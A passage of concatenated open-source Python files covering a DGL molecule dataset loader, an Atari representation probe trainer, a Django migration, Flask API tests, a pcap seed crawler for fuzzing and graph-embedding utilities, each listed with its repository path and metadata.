Function for converting a SMILES (str) into a DGLGraph.
node_featurizer : callable, rdkit.Chem.rdchem.Mol -> dict
Featurization for nodes like atoms in a molecule, which can be used to update
ndata for a DGLGraph.
edge_featurizer : callable, rdkit.Chem.rdchem.Mol -> dict
Featurization for edges like bonds in a molecule, which can be used to update
edata for a DGLGraph.
load : bool
Whether to load the previously pre-processed dataset or pre-process from scratch.
``load`` should be False when we want to try different graph construction and
featurization methods and need to preprocess from scratch. Default to True.
log_every : bool
Print a message every time ``log_every`` molecules are processed. It only comes
into effect when :attr:`n_jobs` is greater than 1.
init_mask : bool
Whether to initialize a binary mask indicating the existence of labels.
n_jobs : int
Degree of parallelism for pre processing. Default to 1.
error_log : str
Path to a CSV file of molecules that RDKit failed to parse. If not specified,
the molecules will not be recorded.
"""
if os.path.exists(self.cache_file_path) and load:
# DGLGraphs have been constructed before, reload them
print('Loading previously saved dgl graphs...')
self.graphs, label_dict = load_graphs(self.cache_file_path)
self.labels = label_dict['labels']
if init_mask:
self.mask = label_dict['mask']
self.valid_ids = label_dict['valid_ids'].tolist()
else:
print('Processing dgl graphs from scratch...')
if n_jobs > 1:
self.graphs = pmap(smiles_to_graph,
self.smiles,
node_featurizer=node_featurizer,
edge_featurizer=edge_featurizer,
n_jobs=n_jobs)
else:
self.graphs = []
for i, s in enumerate(self.smiles):
if (i + 1) % log_every == 0:
print('Processing molecule {:d}/{:d}'.format(i+1, len(self)))
self.graphs.append(smiles_to_graph(s, node_featurizer=node_featurizer,
edge_featurizer=edge_featurizer))
# Keep only valid molecules
self.valid_ids = []
graphs = []
failed_mols = []
for i, g in enumerate(self.graphs):
if g is not None:
self.valid_ids.append(i)
graphs.append(g)
else:
failed_mols.append((i, self.smiles[i]))
if error_log is not None:
if len(failed_mols) > 0:
failed_ids, failed_smis = map(list, zip(*failed_mols))
else:
failed_ids, failed_smis = [], []
df = pd.DataFrame({'raw_id': failed_ids, 'smiles': failed_smis})
df.to_csv(error_log, index=False)
self.graphs = graphs
_label_values = self.df[self.task_names].values
# np.nan_to_num will also turn inf into a very large number
self.labels = F.zerocopy_from_numpy(
np.nan_to_num(_label_values).astype(np.float32))[self.valid_ids]
valid_ids = torch.tensor(self.valid_ids)
if init_mask:
self.mask = F.zerocopy_from_numpy(
(~np.isnan(_label_values)).astype(np.float32))[self.valid_ids]
save_graphs(self.cache_file_path, self.graphs,
labels={'labels': self.labels, 'mask': self.mask,
'valid_ids': valid_ids})
else:
self.mask = None
save_graphs(self.cache_file_path, self.graphs,
labels={'labels': self.labels, 'valid_ids': valid_ids})
self.smiles = [self.smiles[i] for i in self.valid_ids]
def __getitem__(self, item):
"""Get datapoint with index
Parameters
----------
item : int
Datapoint index
Returns
-------
str
SMILES for the ith datapoint
DGLGraph
DGLGraph for the ith datapoint
Tensor of dtype float32 and shape (T)
Labels of the datapoint for all tasks
Tensor of dtype float32 and shape (T), optional
Binary masks indicating the existence of labels for all tasks. This is only
generated when ``init_mask`` is True in the initialization.
"""
if self.mask is not None:
return self.smiles[item], self.graphs[item], self.labels[item], self.mask[item]
else:
return self.smiles[item], self.graphs[item], self.labels[item]
def __len__(self):
"""Size for the dataset
Returns
-------
int
Size for the dataset
"""
return len(self.smiles)
def task_pos_weights(self, indices):
"""Get weights for positive samples on each task
This should only be used when all tasks are binary classification.
It's quite common that the number of positive samples and the number of
negative samples are significantly different for binary classification.
To compensate for the class imbalance issue, we can weight each datapoint
in loss computation.
In particular, for each task we will set the weight of negative samples
to be 1 and the weight of positive samples to be the number of negative
samples divided by the number of positive samples.
Parameters
----------
indices : 1D LongTensor
The function will compute the weights on the data subset specified by
the indices, e.g. the indices for the training set.
Returns
-------
Tensor of dtype float32 and shape (T)
Weight of positive samples on all tasks
"""
task_pos_weights = torch.ones(self.labels.shape[1])
num_pos = F.sum(self.labels[indices], dim=0)
num_indices = F.sum(self.mask[indices], dim=0)
task_pos_weights[num_pos > 0] = ((num_indices - num_pos) / num_pos)[num_pos > 0]
return task_pos_weights
|
desktop/core/ext-py/nose-1.3.7/unit_tests/test_isolation_plugin.py
|
kokosing/hue
| 5,079 |
85388
|
<reponame>kokosing/hue
def test_lint():
import nose.plugins.isolate
|
demos/python/sdk_wireless_camera_control/open_gopro/wifi/adapters/__init__.py
|
Natureshadow/OpenGoPro
| 210 |
85390
|
<filename>demos/python/sdk_wireless_camera_control/open_gopro/wifi/adapters/__init__.py
# __init__.py/Open GoPro, Version 2.0 (C) Copyright 2021 GoPro, Inc. (http://gopro.com/OpenGoPro).
# This copyright was auto-generated on Tue Sep 7 21:35:53 UTC 2021
"""Universal WiFi adapter implementation for Open GoPro WiFi interface"""
from .wireless import Wireless
|
atariari/benchmark/probe.py
|
tmoopenn/atari-representation-learning
| 175 |
85415
|
import torch
from torch import nn
from .utils import EarlyStopping, appendabledict, \
calculate_multiclass_accuracy, calculate_multiclass_f1_score,\
append_suffix, compute_dict_average
from copy import deepcopy
import numpy as np
from torch.utils.data import RandomSampler, BatchSampler
from .categorization import summary_key_dict
class LinearProbe(nn.Module):
def __init__(self, input_dim, num_classes=255):
super().__init__()
self.model = nn.Linear(in_features=input_dim, out_features=num_classes)
def forward(self, feature_vectors):
return self.model(feature_vectors)
class FullySupervisedLinearProbe(nn.Module):
def __init__(self, encoder, num_classes=255):
super().__init__()
self.encoder = deepcopy(encoder)
self.probe = LinearProbe(input_dim=self.encoder.hidden_size,
num_classes=num_classes)
def forward(self, x):
feature_vec = self.encoder(x)
return self.probe(feature_vec)
class ProbeTrainer():
def __init__(self,
encoder=None,
method_name="my_method",
wandb=None,
patience=15,
num_classes=256,
fully_supervised=False,
save_dir=".models",
device=torch.device("cuda" if torch.cuda.is_available() else "cpu"),
lr=5e-4,
epochs=100,
batch_size=64,
representation_len=256):
self.encoder = encoder
self.wandb = wandb
self.device = device
self.fully_supervised = fully_supervised
self.save_dir = save_dir
self.num_classes = num_classes
self.epochs = epochs
self.lr = lr
self.batch_size = batch_size
self.patience = patience
self.method = method_name
self.feature_size = representation_len
self.loss_fn = nn.CrossEntropyLoss()
# bad convention, but these get set in "create_probes"
self.probes = self.early_stoppers = self.optimizers = self.schedulers = None
def create_probes(self, sample_label):
if self.fully_supervised:
assert self.encoder != None, "for fully supervised you must provide an encoder!"
self.probes = {k: FullySupervisedLinearProbe(encoder=self.encoder,
num_classes=self.num_classes).to(self.device) for k in
sample_label.keys()}
else:
self.probes = {k: LinearProbe(input_dim=self.feature_size,
num_classes=self.num_classes).to(self.device) for k in sample_label.keys()}
self.early_stoppers = {
k: EarlyStopping(patience=self.patience, verbose=False, name=k + "_probe", save_dir=self.save_dir)
for k in sample_label.keys()}
self.optimizers = {k: torch.optim.Adam(list(self.probes[k].parameters()),
eps=1e-5, lr=self.lr) for k in sample_label.keys()}
self.schedulers = {
k: torch.optim.lr_scheduler.ReduceLROnPlateau(self.optimizers[k], patience=5, factor=0.2, verbose=True,
mode='max', min_lr=1e-5) for k in sample_label.keys()}
def generate_batch(self, episodes, episode_labels):
total_steps = sum([len(e) for e in episodes])
assert total_steps > self.batch_size
print('Total Steps: {}'.format(total_steps))
# Episode sampler
# Sample `num_samples` episodes then batchify them with `self.batch_size` episodes per batch
sampler = BatchSampler(RandomSampler(range(len(episodes)),
replacement=True, num_samples=total_steps),
self.batch_size, drop_last=True)
for indices in sampler:
episodes_batch = [episodes[x] for x in indices]
episode_labels_batch = [episode_labels[x] for x in indices]
xs, labels = [], appendabledict()
for ep_ind, episode in enumerate(episodes_batch):
# Get one sample from this episode
t = np.random.randint(len(episode))
xs.append(episode[t])
labels.append_update(episode_labels_batch[ep_ind][t])
yield torch.stack(xs).float().to(self.device) / 255., labels
def probe(self, batch, k):
probe = self.probes[k]
probe.to(self.device)
if self.fully_supervised:
# if method is supervised batch is a batch of frames and probe is a full encoder + linear or nonlinear probe
preds = probe(batch)
elif not self.encoder:
# if encoder is None then inputs are vectors
f = batch.detach()
assert len(f.squeeze().shape) == 2, "if input is not a batch of vectors you must specify an encoder!"
preds = probe(f)
else:
with torch.no_grad():
self.encoder.to(self.device)
f = self.encoder(batch).detach()
preds = probe(f)
return preds
def do_one_epoch(self, episodes, label_dicts):
sample_label = label_dicts[0][0]
epoch_loss, accuracy = {k + "_loss": [] for k in sample_label.keys() if
not self.early_stoppers[k].early_stop}, \
{k + "_acc": [] for k in sample_label.keys() if
not self.early_stoppers[k].early_stop}
data_generator = self.generate_batch(episodes, label_dicts)
for step, (x, labels_batch) in enumerate(data_generator):
for k, label in labels_batch.items():
if self.early_stoppers[k].early_stop:
continue
optim = self.optimizers[k]
optim.zero_grad()
label = torch.tensor(label).long().to(self.device)
preds = self.probe(x, k)
loss = self.loss_fn(preds, label)
epoch_loss[k + "_loss"].append(loss.detach().item())
preds = preds.cpu().detach().numpy()
preds = np.argmax(preds, axis=1)
label = label.cpu().detach().numpy()
accuracy[k + "_acc"].append(calculate_multiclass_accuracy(preds,
label))
if self.probes[k].training:
loss.backward()
optim.step()
epoch_loss = {k: np.mean(loss) for k, loss in epoch_loss.items()}
accuracy = {k: np.mean(acc) for k, acc in accuracy.items()}
return epoch_loss, accuracy
def do_test_epoch(self, episodes, label_dicts):
sample_label = label_dicts[0][0]
accuracy_dict, f1_score_dict = {}, {}
pred_dict, all_label_dict = {k: [] for k in sample_label.keys()}, \
{k: [] for k in sample_label.keys()}
# collect all predictions first
data_generator = self.generate_batch(episodes, label_dicts)
for step, (x, labels_batch) in enumerate(data_generator):
for k, label in labels_batch.items():
label = torch.tensor(label).long().cpu()
all_label_dict[k].append(label)
preds = self.probe(x, k).detach().cpu()
pred_dict[k].append(preds)
for k in all_label_dict.keys():
preds, labels = torch.cat(pred_dict[k]).cpu().detach().numpy(),\
torch.cat(all_label_dict[k]).cpu().detach().numpy()
preds = np.argmax(preds, axis=1)
accuracy = calculate_multiclass_accuracy(preds, labels)
f1score = calculate_multiclass_f1_score(preds, labels)
accuracy_dict[k] = accuracy
f1_score_dict[k] = f1score
return accuracy_dict, f1_score_dict
def train(self, tr_eps, val_eps, tr_labels, val_labels):
# if not self.encoder:
# assert len(tr_eps[0][0].squeeze().shape) == 2, "if input is a batch of vectors you must specify an encoder!"
sample_label = tr_labels[0][0]
self.create_probes(sample_label)
e = 0
all_probes_stopped = np.all([early_stopper.early_stop for early_stopper in self.early_stoppers.values()])
while (not all_probes_stopped) and e < self.epochs:
epoch_loss, accuracy = self.do_one_epoch(tr_eps, tr_labels)
self.log_results(e, epoch_loss, accuracy)
val_loss, val_accuracy = self.evaluate(val_eps, val_labels, epoch=e)
# update all early stoppers
for k in sample_label.keys():
if not self.early_stoppers[k].early_stop:
self.early_stoppers[k](val_accuracy["val_" + k + "_acc"], self.probes[k])
for k, scheduler in self.schedulers.items():
if not self.early_stoppers[k].early_stop:
scheduler.step(val_accuracy['val_' + k + '_acc'])
e += 1
all_probes_stopped = np.all([early_stopper.early_stop for early_stopper in self.early_stoppers.values()])
print("All probes early stopped!")
def evaluate(self, val_episodes, val_label_dicts, epoch=None):
for k, probe in self.probes.items():
probe.eval()
epoch_loss, accuracy = self.do_one_epoch(val_episodes, val_label_dicts)
epoch_loss = {"val_" + k: v for k, v in epoch_loss.items()}
accuracy = {"val_" + k: v for k, v in accuracy.items()}
self.log_results(epoch, epoch_loss, accuracy)
for k, probe in self.probes.items():
probe.train()
return epoch_loss, accuracy
def test(self, test_episodes, test_label_dicts, epoch=None):
for k in self.early_stoppers.keys():
self.early_stoppers[k].early_stop = False
for k, probe in self.probes.items():
probe.eval()
acc_dict, f1_dict = self.do_test_epoch(test_episodes, test_label_dicts)
acc_dict, f1_dict = postprocess_raw_metrics(acc_dict, f1_dict)
print("""In our paper, we report F1 scores and accuracies averaged across each category.
That is, we take a mean across all state variables in a category to get the average score for that category.
Then we average all the category averages to get the final score that we report per game for each method.
These scores are called \'across_categories_avg_acc\' and \'across_categories_avg_f1\' respectively
We do this to prevent categories with large number of state variables dominating the mean F1 score.
""")
self.log_results("Test", acc_dict, f1_dict)
return acc_dict, f1_dict
def log_results(self, epoch_idx, *dictionaries):
print("Epoch: {}".format(epoch_idx))
for dictionary in dictionaries:
for k, v in dictionary.items():
print("\t {}: {:8.4f}".format(k, v))
print("\t --")
def postprocess_raw_metrics(acc_dict, f1_dict):
acc_overall_avg, f1_overall_avg = compute_dict_average(acc_dict), \
compute_dict_average(f1_dict)
acc_category_avgs_dict, f1_category_avgs_dict = compute_category_avgs(acc_dict), \
compute_category_avgs(f1_dict)
acc_avg_across_categories, f1_avg_across_categories = compute_dict_average(acc_category_avgs_dict), \
compute_dict_average(f1_category_avgs_dict)
acc_dict.update(acc_category_avgs_dict)
f1_dict.update(f1_category_avgs_dict)
acc_dict["overall_avg"], f1_dict["overall_avg"] = acc_overall_avg, f1_overall_avg
acc_dict["across_categories_avg"], f1_dict["across_categories_avg"] = [acc_avg_across_categories,
f1_avg_across_categories]
acc_dict = append_suffix(acc_dict, "_acc")
f1_dict = append_suffix(f1_dict, "_f1")
return acc_dict, f1_dict
def compute_category_avgs(metric_dict):
category_dict = {}
for category_name, category_keys in summary_key_dict.items():
category_values = [v for k, v in metric_dict.items() if k in category_keys]
if len(category_values) < 1:
continue
category_mean = np.mean(category_values)
category_dict[category_name + "_avg"] = category_mean
return category_dict
|
tests/migrations/0001_initial.py
|
wethegit/django-modelcluster
| 278 |
85424
|
<gh_stars>100-1000
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import modelcluster.fields
import django.db.models.deletion
import modelcluster.contrib.taggit
class Migration(migrations.Migration):
dependencies = [
('taggit', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Album',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
('release_date', models.DateField(null=True, blank=True)),
('sort_order', models.IntegerField(null=True, editable=False, blank=True)),
],
options={
'ordering': ['sort_order'],
},
),
migrations.CreateModel(
name='Band',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='BandMember',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
('band', modelcluster.fields.ParentalKey(related_name='members', to='tests.Band', on_delete=django.db.models.deletion.CASCADE)),
],
),
migrations.CreateModel(
name='Chef',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Dish',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Log',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('time', models.DateTimeField(null=True, blank=True)),
('data', models.CharField(max_length=255)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='MenuItem',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('price', models.DecimalField(max_digits=6, decimal_places=2)),
('dish', models.ForeignKey(related_name='+', to='tests.Dish', on_delete=django.db.models.deletion.CASCADE)),
],
),
migrations.CreateModel(
name='Place',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Review',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('author', models.CharField(max_length=255)),
('body', models.TextField()),
],
),
migrations.CreateModel(
name='TaggedPlace',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Wine',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Restaurant',
fields=[
('place_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='tests.Place', on_delete=django.db.models.deletion.CASCADE)),
('serves_hot_dogs', models.BooleanField(default=False)),
('proprietor', models.ForeignKey(related_name='restaurants', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='tests.Chef', null=True)),
],
options={
'abstract': False,
},
bases=('tests.place',),
),
migrations.CreateModel(
name='Document',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),
('title', models.CharField(max_length=255)),
('file', models.FileField(upload_to='documents')),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='taggedplace',
name='content_object',
field=modelcluster.fields.ParentalKey(related_name='tagged_items', to='tests.Place', on_delete=django.db.models.deletion.CASCADE),
),
migrations.AddField(
model_name='taggedplace',
name='tag',
field=models.ForeignKey(related_name='tests_taggedplace_items', to='taggit.Tag', on_delete=django.db.models.deletion.CASCADE),
),
migrations.AddField(
model_name='review',
name='place',
field=modelcluster.fields.ParentalKey(related_name='reviews', to='tests.Place', on_delete=django.db.models.deletion.CASCADE),
),
migrations.AddField(
model_name='place',
name='tags',
field=modelcluster.contrib.taggit.ClusterTaggableManager(to='taggit.Tag', through='tests.TaggedPlace', blank=True, help_text='A comma-separated list of tags.', verbose_name='Tags'),
),
migrations.AddField(
model_name='menuitem',
name='recommended_wine',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='tests.Wine', null=True),
),
migrations.AddField(
model_name='album',
name='band',
field=modelcluster.fields.ParentalKey(related_name='albums', to='tests.Band', on_delete=django.db.models.deletion.CASCADE),
),
migrations.AddField(
model_name='menuitem',
name='restaurant',
field=modelcluster.fields.ParentalKey(related_name='menu_items', to='tests.Restaurant', on_delete=django.db.models.deletion.CASCADE),
),
]
|
fexm/seed_crawlers/pcap_crawler.py
|
fgsect/fexm
| 105 |
85449
|
#!/usr/bin/env python3
"""
Crawls all links on a webpage for pcaps.
"""
import argparse
import logging
from multiprocessing.pool import ThreadPool
from urllib.parse import urljoin
import os
import requests
from bs4 import BeautifulSoup
from functools import partial
from helpers import utils
from seed_crawlers import pcap_parser
logging.basicConfig()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
POOL_WORKER_COUNT = 8 # How many downloads we should run at the same time
def download_and_depcapize(url: str, out_dir: str, keep_pcaps: bool = False, ignore_exts: bool = False,
skip_analysis: bool = False) -> None:
"""
Downloads to a tmp folder inside the given folder (./pcap_tmp) and then parses each pcap to a text file
:param url: the page to crawl (depth 1)
:param out_dir: the download folder
:param keep_pcaps: if the pcaps inside ./pcap_tmp should be removed after finish
:param ignore_exts: If true, we'll also download unsupported file extensions (not .cap, .pcap, .gz or .pcapng)
:param skip_analysis: If true, we'll only download, not `depcapize` (run pcap parser) on the files.
"""
if not keep_pcaps and skip_analysis:
raise ValueError("Deleting PCAPs after a run while also skipping the analysis part would not make any sense.")
pool = ThreadPool(POOL_WORKER_COUNT)
logger.info("Downloading and parsing {}".format(url))
page = BeautifulSoup(requests.get(url).text, "html.parser")
link_anchors = page.find_all("a")
links = list(map(lambda x: x.get("href"), link_anchors)) # type: [str]
tmpdir = os.path.join(out_dir, "pcap_tmp")
os.makedirs(out_dir, exist_ok=True)
os.makedirs(tmpdir, exist_ok=True)
download_list = []
for link in links:
if not ignore_exts and "{}.".format(link).rsplit(".", 2)[1].lower() not in pcap_parser.SUPPORTED_EXTENSIONS:
logger.info("Ignoring file {} - unsupported extension.".format(link))
continue
download_url = urljoin(url, link)
download_list.append(download_url)
logger.info("Downloading {} files as network seeds.".format(len(download_list)))
downloader = partial(utils.download_file, tmpdir)
pool.map(downloader, download_list)
logger.info("Done downloading all files from {}".format(url))
if not skip_analysis:
pcap_parser.Overmind(backend=pcap_parser.FileBackend(outfolder=out_dir)).analyze_folder(
tmpdir).finish_analysis()
if not keep_pcaps:
logger.info("Removing tmpdir.")
os.unlink(tmpdir)
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser(description="Downloads all PCAPS from a webpage, stores them to a tmp folder "
"and then converts them to plaintext")
# arg_parser.add_argument("-f", "--filter",
# default="port not 22 and host 10.7.14.2",
# help="TCPdump style filter to use")
arg_parser.add_argument("-o", "--outdir", default="./out", help="Folder to write output files to.")
arg_parser.add_argument("-u", "--url",
default="https://wiki.wireshark.org/SampleCaptures", help="The url to crawl pcaps from")
arg_parser.add_argument("-e", "--ignore-exts", default=False, help="If true, unknown extensions will be downloaded")
arg_parser.add_argument("--keep-pcaps", default=True, help="Keep or remove pcaps in ./pcap_tmp")
arg_parser.add_argument("--skip-analysis", default=False, help="Skip the analysis, only download to ./pcap_tmp.")
args = arg_parser.parse_args()
download_and_depcapize(out_dir=args.outdir, url=args.url, ignore_exts=args.ignore_exts, keep_pcaps=args.keep_pcaps,
skip_analysis=args.skip_analysis)
|
examples/recurrent/lightning_example.py
|
tforgaard/pytorch_geometric_temporal
| 1,410 |
85450
|
<filename>examples/recurrent/lightning_example.py<gh_stars>1000+
import torch
from torch.nn import functional as F
import pytorch_lightning as pl
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
from torch_geometric_temporal.nn.recurrent import DCRNN
from torch_geometric_temporal.dataset import ChickenpoxDatasetLoader
from torch_geometric_temporal.signal import temporal_signal_split
class LitDiffConvModel(pl.LightningModule):
def __init__(self, node_features, filters):
super().__init__()
self.recurrent = DCRNN(node_features, filters, 1)
self.linear = torch.nn.Linear(filters, 1)
def configure_optimizers(self):
optimizer = torch.optim.Adam(self.parameters(), lr=1e-2)
return optimizer
def training_step(self, train_batch, batch_idx):
x = train_batch.x
y = train_batch.y.view(-1, 1)
edge_index = train_batch.edge_index
h = self.recurrent(x, edge_index)
h = F.relu(h)
h = self.linear(h)
loss = F.mse_loss(h, y)
return loss
def validation_step(self, val_batch, batch_idx):
x = val_batch.x
y = val_batch.y.view(-1, 1)
edge_index = val_batch.edge_index
h = self.recurrent(x, edge_index)
h = F.relu(h)
h = self.linear(h)
loss = F.mse_loss(h, y)
metrics = {'val_loss': loss}
self.log_dict(metrics)
return metrics
loader = ChickenpoxDatasetLoader()
dataset_loader = loader.get_dataset(lags=32)
train_loader, val_loader = temporal_signal_split(dataset_loader,
train_ratio=0.2)
model = LitDiffConvModel(node_features=32,
filters=16)
early_stop_callback = EarlyStopping(monitor='val_loss',
min_delta=0.00,
patience=10,
verbose=False,
mode='max')
trainer = pl.Trainer(callbacks=[early_stop_callback])
trainer.fit(model, train_loader, val_loader)
|
tests/modules/teams/resources/test_getting_teams_info.py
|
IsmaelJS/test-github-actions
| 1,420 |
85465
|
<filename>tests/modules/teams/resources/test_getting_teams_info.py
# encoding: utf-8
import pytest
@pytest.mark.parametrize('auth_scopes', (
None,
('teams:write', ),
))
def test_getting_list_of_teams_by_unauthorized_user_must_fail(
flask_app_client,
regular_user,
auth_scopes
):
with flask_app_client.login(regular_user, auth_scopes=auth_scopes):
response = flask_app_client.get('/api/v1/teams/')
assert response.status_code == 401
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'status', 'message'}
@pytest.mark.parametrize('auth_scopes', (
('teams:read', ),
('teams:read', 'teams:write', ),
))
def test_getting_list_of_teams_by_authorized_user(
flask_app_client,
regular_user,
team_for_regular_user,
auth_scopes
):
with flask_app_client.login(regular_user, auth_scopes=auth_scopes):
response = flask_app_client.get('/api/v1/teams/')
assert response.status_code == 200
assert 'X-Total-Count' in response.headers
assert int(response.headers['X-Total-Count']) == 1
assert response.content_type == 'application/json'
assert isinstance(response.json, list)
assert set(response.json[0].keys()) >= {'id', 'title'}
if response.json[0]['id'] == team_for_regular_user.id:
assert response.json[0]['title'] == team_for_regular_user.title
@pytest.mark.parametrize('auth_scopes', (
None,
('teams:write', ),
))
def test_getting_team_info_by_unauthorized_user_must_fail(
flask_app_client,
regular_user,
team_for_regular_user,
auth_scopes
):
with flask_app_client.login(regular_user, auth_scopes=auth_scopes):
response = flask_app_client.get('/api/v1/teams/%d' % team_for_regular_user.id)
assert response.status_code == 401
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'status', 'message'}
@pytest.mark.parametrize('auth_scopes', (
('teams:read', ),
('teams:read', 'teams:write', ),
))
def test_getting_team_info_by_authorized_user(
flask_app_client,
regular_user,
team_for_regular_user,
auth_scopes
):
with flask_app_client.login(regular_user, auth_scopes=auth_scopes):
response = flask_app_client.get('/api/v1/teams/%d' % team_for_regular_user.id)
assert response.status_code == 200
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'id', 'title'}
assert response.json['id'] == team_for_regular_user.id
assert response.json['title'] == team_for_regular_user.title
@pytest.mark.parametrize('auth_scopes', (
None,
('teams:write', ),
))
def test_getting_list_of_team_members_by_unauthorized_user_must_fail(
flask_app_client,
regular_user,
team_for_regular_user,
auth_scopes
):
with flask_app_client.login(regular_user, auth_scopes=auth_scopes):
response = flask_app_client.get('/api/v1/teams/%d/members/' % team_for_regular_user.id)
assert response.status_code == 401
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'status', 'message'}
@pytest.mark.parametrize('auth_scopes', (
('teams:read', ),
('teams:read', 'teams:write', ),
))
def test_getting_list_of_team_members_by_authorized_user(
flask_app_client,
regular_user,
team_for_regular_user,
auth_scopes
):
with flask_app_client.login(regular_user, auth_scopes=auth_scopes):
response = flask_app_client.get('/api/v1/teams/%d/members/' % team_for_regular_user.id)
assert response.status_code == 200
assert response.content_type == 'application/json'
assert isinstance(response.json, list)
assert set(response.json[0].keys()) >= {'team', 'user', 'is_leader'}
assert set(member['team']['id'] for member in response.json) == {team_for_regular_user.id}
assert regular_user.id in set(member['user']['id'] for member in response.json)
|
running_modes/validation/logging/local_validation_logger.py
|
lilleswing/Reinvent-1
| 183 |
85471
|
<gh_stars>100-1000
from running_modes.configurations.general_configuration_envelope import GeneralConfigurationEnvelope
from running_modes.validation.logging.base_validation_logger import BaseValidationLogger
class LocalValidationLogger(BaseValidationLogger):
def __init__(self, configuration: GeneralConfigurationEnvelope):
super().__init__(configuration)
def log_message(self, message: str):
self._common_logger.info(message)
|
src/bionev/utils.py
|
QustKcz/BioNEV
| 195 |
85474
|
<filename>src/bionev/utils.py
# -*- coding: utf-8 -*-
import copy
import itertools
import random
import networkx as nx
import numpy as np
import bionev.OpenNE.graph as og
import bionev.struc2vec.graph as sg
def read_for_OpenNE(filename, weighted=False):
G = og.Graph()
print("Loading training graph for learning embedding...")
G.read_edgelist(filename=filename, weighted=weighted)
print("Graph Loaded...")
return G
def read_for_struc2vec(filename):
print("Loading training graph for learning embedding...")
G = sg.load_edgelist(filename, undirected=True)
print("Graph Loaded...")
return G
def read_for_gae(filename, weighted=False):
print("Loading training graph for learning embedding...")
edgelist = np.loadtxt(filename, dtype='float')
if weighted:
edgelist = [(int(edgelist[idx, 0]), int(edgelist[idx, 1])) for idx in range(edgelist.shape[0]) if
edgelist[idx, 2] > 0]
else:
edgelist = [(int(edgelist[idx, 0]), int(edgelist[idx, 1])) for idx in range(edgelist.shape[0])]
G=nx.from_edgelist(edgelist)
node_list=list(G.nodes)
adj = nx.adjacency_matrix(G, nodelist=node_list)
print("Graph Loaded...")
return (adj,node_list)
def read_for_SVD(filename, weighted=False):
if weighted:
G = nx.read_weighted_edgelist(filename)
else:
G = nx.read_edgelist(filename)
return G
def split_train_test_graph(input_edgelist, seed, testing_ratio=0.2, weighted=False):
if (weighted):
G = nx.read_weighted_edgelist(input_edgelist)
else:
G = nx.read_edgelist(input_edgelist)
node_num1, edge_num1 = len(G.nodes), len(G.edges)
print('Original Graph: nodes:', node_num1, 'edges:', edge_num1)
testing_edges_num = int(len(G.edges) * testing_ratio)
random.seed(seed)
testing_pos_edges = random.sample(G.edges, testing_edges_num)
G_train = copy.deepcopy(G)
for edge in testing_pos_edges:
node_u, node_v = edge
if (G_train.degree(node_u) > 1 and G_train.degree(node_v) > 1):
G_train.remove_edge(node_u, node_v)
G_train.remove_nodes_from(nx.isolates(G_train))
node_num2, edge_num2 = len(G_train.nodes), len(G_train.edges)
assert node_num1 == node_num2
train_graph_filename = 'graph_train.edgelist'
if weighted:
nx.write_edgelist(G_train, train_graph_filename, data=['weight'])
else:
nx.write_edgelist(G_train, train_graph_filename, data=False)
node_num1, edge_num1 = len(G_train.nodes), len(G_train.edges)
print('Training Graph: nodes:', node_num1, 'edges:', edge_num1)
return G, G_train, testing_pos_edges, train_graph_filename
def generate_neg_edges(original_graph, testing_edges_num, seed):
L = list(original_graph.nodes())
# create a complete graph
G = nx.Graph()
G.add_nodes_from(L)
G.add_edges_from(itertools.combinations(L, 2))
# remove original edges
G.remove_edges_from(original_graph.edges())
random.seed(seed)
neg_edges = random.sample(G.edges, testing_edges_num)
return neg_edges
def load_embedding(embedding_file_name, node_list=None):
with open(embedding_file_name) as f:
node_num, emb_size = f.readline().split()
print('Nodes with embedding: %s'%node_num)
embedding_look_up = {}
if node_list:
for line in f:
vec = line.strip().split()
node_id = vec[0]
if (node_id in node_list):
emb = [float(x) for x in vec[1:]]
emb = emb / np.linalg.norm(emb)
emb[np.isnan(emb)] = 0
embedding_look_up[node_id] = np.array(emb)
# if len(node_list) != len(embedding_look_up):
# diff_nodes=set(node_list).difference(set(embedding_look_up.keys()))
# for node in diff_nodes:
# emb = np.random.random((int(emb_size)))
# emb = emb / np.linalg.norm(emb)
# emb[np.isnan(emb)] = 0
# embedding_look_up[node] = np.array(emb)
assert len(node_list) == len(embedding_look_up)
else:
for line in f:
vec = line.strip().split()
node_id = vec[0]
embeddings = vec[1:]
emb = [float(x) for x in embeddings]
emb = emb / np.linalg.norm(emb)
emb[np.isnan(emb)] = 0
